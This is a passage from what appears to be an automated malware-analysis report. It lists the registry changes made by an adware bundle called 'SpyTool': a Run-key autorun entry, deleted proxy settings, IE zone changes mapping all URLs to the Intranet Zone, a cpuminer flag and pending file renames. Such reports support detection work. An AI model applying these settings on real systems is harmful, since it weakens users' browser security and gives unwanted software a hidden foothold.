"Seed" = "3D 63 DA 08 7C 5B DC 38 2B 13 69 73 96 73 D9 0B"
The process wmic.exe:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 6B 02 51 21 C9 D4 D0 BE A9 51 42 0F DD 9E 04"
The process amisid.exe:496 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "975F29BE8C8FD0BC5E8EBA2BBF1B629F"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC A4 89 A4 87 DB DB 5A 69 41 0B 02 CC B9 BE 8D"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process amisid.exe:600 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 0A D9 92 60 D5 EE 28 B7 7D 87 3C F5 50 BB DA"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "975F29BE8C8FD0BC5E8EBA2BBF1B629F"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process tasklist.exe:1852 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4F 09 7D 56 91 75 35 10 33 EF F8 ED 63 8D 30"
The process tasklist.exe:492 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 30 1C 8C 24 D3 3B 18 53 C9 78 61 CB 08 DB 02"
The process nsr21.tmp:908 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss25.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 0A A8 1E 68 9B 79 BA 8F 55 F1 DF 64 03 5E 77"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings to map all local web nodes (names with no dots) which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsr18.tmp:1388 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 37 10 41 23 A8 F2 36 B5 E4 65 07 39 26 91 CC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process nsr18.tmp:460 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB D9 4A F0 50 51 09 45 AB C5 90 4F 84 B3 59 64"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings to map all local web nodes (names with no dots) which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsx27.tmp:1340 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F F3 AD 45 EF 40 02 11 55 96 3E CC A3 8E 26 4A"
The process nsx27.tmp:336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.24"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: User" = "%CurrentUserName%"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"InstallDate" = "20150925"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\gmsd_re_005010096\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Publisher" = "GAMESDESKTOP"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Language" = "re"
[HKCU\Software\Microsoft\Tinstalls]
"20150925" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"DisplayName" = "GamesDesktop 092.005010096"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010096]
"PathInstall" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 32 AB F8 CD F8 EC 84 FC 22 D0 64 83 02 35 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoModify" = "1"
"Inno Setup: Setup Version" = "5.5.6 (a)"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process encrypt.exe:1700 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 7D 9D B9 4D 8F EA 30 C9 CE C1 FC DE 74 0E 9B"
The process encrypt.exe:1364 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 15 B5 48 15 CA 7D A4 AD 44 2C 75 64 52 88 B2"
The process encrypt.exe:1564 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 87 5B 1D 77 67 56 E5 9D 8D FD B8 6B 93 95 00"
The process encrypt.exe:496 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA DB 0A BE AD B7 ED C6 D3 F7 DD 09 FF 91 71 8C"
The process %original file name%.exe:860 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 1C 77 55 34 FE BA A2 FB D1 9A 65 68 45 8C B9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
